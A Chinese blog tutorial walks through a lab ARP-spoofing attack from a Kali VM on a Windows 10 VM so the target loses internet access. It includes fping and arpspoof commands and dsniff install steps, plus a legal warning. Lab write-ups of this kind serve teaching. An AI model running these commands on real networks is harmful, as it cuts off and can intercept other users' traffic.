admin管理员组

文章数量:1654510

目录

一.前言

二.实验机器

三.实验过程

实验准备

  被攻击机IP   

  被攻击机网管  

实验开始

  查询局域网内ip

  开始攻击

  Windows被攻击状态

  Windows和kali网管状态

参考文章


一.前言


本次依然使用Kali系统演示ARP欺骗,导致局域网目标设备无法上网。
根据我国《刑法》第二百八十六条的规定,违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役,后果特别严重的,处五年以上有期徒刑。 谨慎操作,请勿违法!
 

二.实验机器

被攻击机(虚拟机windows10专业版)

攻击机 (虚拟机kali)

三.实验过程

实验准备

  被攻击机IP   

   ip:192.168.17.130

  被攻击机网管  

   Win10   

   cmd指令:arp -a(查看arp缓存)

 此时可上网

实验开始

  查询局域网内ip

  Kali输入

  指令:fping -asg 局域网范围

  我的是:fping -asg 192.168.17.0/24   

  (注意:如果kali权限不够的话需要在kali内使用指令:sudo su)

(这里原本我的win10虚拟机的IP为192.168.17.130,但是kali查询只有129,我后面攻击按照130处理)

  开始攻击

  Kali

  指令:arpspoof -i 网卡 -t 靶机IP地址 网关

  我的是arpspoof -i eth0 -t 192.168.17.130 192.168.17.2

这里出了点小问题


但是我没有dsniff,并且安装不了(如下图)

解决方案:

在kali输入1. sudo apt-get update

                     2. sudo apt-get install dsniff(如下图)


 继续实验

  Windows被攻击状态

  Windows和kali网管状态

这时Windows网管(见右图)Kali的网管(见左图)

Windows网管已经和kali的网管变成一致

 这篇文章到这里就结束了,如果大家没有安装win10虚拟机的话可以看我的这篇文章

VMware虚拟机win10专业版激活_顾轩367的博客-CSDN博客

参考文章

网络安全--使用Kali进行ARP欺骗(详细教程)_kaliarp欺骗_懷淰メ的博客-CSDN博客

本文标签: 虚拟机KaliVMwareARP